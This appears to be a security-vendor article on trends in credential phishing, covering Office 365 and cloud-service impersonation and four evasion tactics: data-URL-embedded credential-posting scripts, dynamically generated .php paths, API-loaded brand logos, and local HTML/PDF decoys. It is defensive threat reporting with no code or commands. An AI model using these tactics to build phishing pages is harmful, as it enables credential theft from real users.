The Expanding Scope and Complexity of Credentials Phishing

Written by

Without our wallet or keys, we can’t get very far.

Most of us are entirely reliant on these essential items to purchase goods and services, access our cars and unlock our front doors. And what if they got into the wrong hands? The idea of losing them is somewhat anxiety inducing.

It is not just our keys and wallets that we have to keep a hold of in today’s world, however. In online spheres, credentials such as email addresses, user IDs, pins and passwords have become the digital equivalent, and protecting these is arguably even more important.

Our ability to access social media platforms, e-commerce sites and streaming services are almost all dependent on the use of credentials, but so too are highly confidential and sensitive services such as digital banking and online doctor’s records. The criminal value of stealing our credentials is, therefore, plain to see.

In March 2021, our team at Menlo Labs observed a steady rise in credential phishing attacks.

Indeed, they are nothing new. In essence, threat actors attempt to steal user ID/email address and pin/password combinations by creating fake login pages or forms that masquerade as a trusted entity.

The bulk of these credential phishing attacks continue to come in the form of fake Microsoft software – namely Outlook and Office 365.

Regarding the latter, the travel industry (and more specifically airline duty-free shop login credentials) has been a key target of late, accounting for 51% of all Office 365 phishing attacks, followed by healthcare and medicine (26.8%) and technology (7.3%).

Office 365 being a focal attack point should come as no surprise given its widespread usage in corporate environments. Yet there has also been an uptick in the number of phishing pages impersonating cloud services such as Azure, OneDrive, Box, Firebase, Dropbox and more recently, Evernote.

The challenge of credentials phishing is not simply related to expanding volumes or platforms either. Equally, increasingly complex tactics are being deployed by attackers to better trick their targets.

We’ve observed a number of these currently occurring within the threat environment, the first being the usage of data URLs to mask content.

Here, threat actors can hide the JavaScript code that posts credentials to a remote URL and embed custom CSS/images on the page itself, ensuring phishing page content is rendered on a browser in a single load. This evades security solutions that rely on the “Content-Type” header to determine resources like JavaScript or CSS, with there being no additional resource requests.

Dynamic content generation is a second, particularly novel tactic that we recently observed in an Office 365 phishing campaign. The user’s email address is added to the end of the URL, with the phishing page path then dynamically generated and the same email address automatically filled.

With the phishing landing page being generated dynamically, the pathname is not only long, but contains two parts: first, a randomly generated folder name, and second, a randomly generated .php file.

Why is this significant? The dynamic generation of .php files allows the phishing kit to evade signature-based detection solutions that rely on detection patterns related to filename/filepaths.

The dynamic loading of brand logos is another tactic we have observed whereby phishing pages make use of APIs to search for and load company specific logos to better trick end users. Using APIs from marketing data engine Clearbit, for example, attackers can dynamically impersonate logos without making an API call to the original site.

Fourthly, we’ve seen the use of local HTML and PDF files as decoys that allow content to be loaded on the endpoint. The core advantage here is that detection from content inspection mechanisms can be avoided, with the content being loaded locally.

Indeed, these are just four recently observed examples of increasingly complex phishing tactics, yet there is a growing sea of other techniques being developed and deployed by attackers on a daily basis.

There is no easy answer to overcoming these challenges, but with 19 in every 20 cyber-attacks resulting from the actions of humans, the first port of call for any organizations should be extensive cybersecurity awareness training and education initiatives.

Users should always be cautious and vigilant of sites which present forms and login requests that ask for credentials. By providing such education, companies can diminish the threat from phishing attacks by promoting better practices.

What’s hot on Infosecurity Magazine?